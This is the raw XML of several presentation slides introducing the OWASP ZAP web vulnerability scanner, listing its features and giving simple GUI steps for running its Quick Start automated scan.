        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1522" name="Google Shape;1522;p219"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190152"/>
            <a:ext cx="4154100" cy="558900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ZAP  Features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1523" name="Google Shape;1523;p219"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5075635" y="1286927"/>
            <a:ext cx="2649140" cy="264914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pic>
        <p:nvPicPr>
          <p:cNvPr id="1528" name="Google Shape;1528;p220"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1529" name="Google Shape;1529;p220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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Intercepting proxy.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Automated scanner.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Passive scanner.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Brute force scanner.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Web sockets.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Advanced sql injection scanner.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Port scanning.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Advanced alerts.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1530" name="Google Shape;1530;p220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1531" name="Google Shape;1531;p220"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190152"/>
            <a:ext cx="3756900" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="116666"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ZAP  Features</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221"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470587" y="414536"/>
            <a:ext cx="5061000" cy="417300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="116666"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How does ZAP tool works ?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1537" name="Google Shape;1537;p221"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1538" name="Google Shape;1538;p221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="685800"/>
            <a:ext cx="8718300" cy="4099500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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539" name="Google Shape;1539;p221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1540" name="Google Shape;1540;p221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451184" y="1091866"/>
            <a:ext cx="8202600" cy="484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none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> ZAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>creates a proxy server and makes your website traffic pass through that server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>. It comprises of auto scanners that help you intercept the vulnerabilities in your website.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1541" name="Google Shape;1541;p221" descr="C:\Users\Dell\Downloads\download.jfif"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840832" y="1787129"/>
            <a:ext cx="5432259" cy="2995424"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1546" name="Google Shape;1546;p222"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1547" name="Google Shape;1547;p222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>  To run a Quick Start Automated Scan :</a:t>
            </a:r>
            <a:endParaRPr sz="2400" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-254000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Start ZAP and click the Quick Start tab of the Workspace Window.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-254000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Click the large Automated Scan button.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-254000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>In the URL to attack text box, enter the full URL of the web application you want to attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-254000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Click the Attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1548" name="Google Shape;1548;p222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1549" name="Google Shape;1549;p222"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190152"/>
            <a:ext cx="4271100" cy="504600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How do you use ZAP ?</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1554" name="Google Shape;1554;p223"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1555" name="Google Shape;1555;p223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
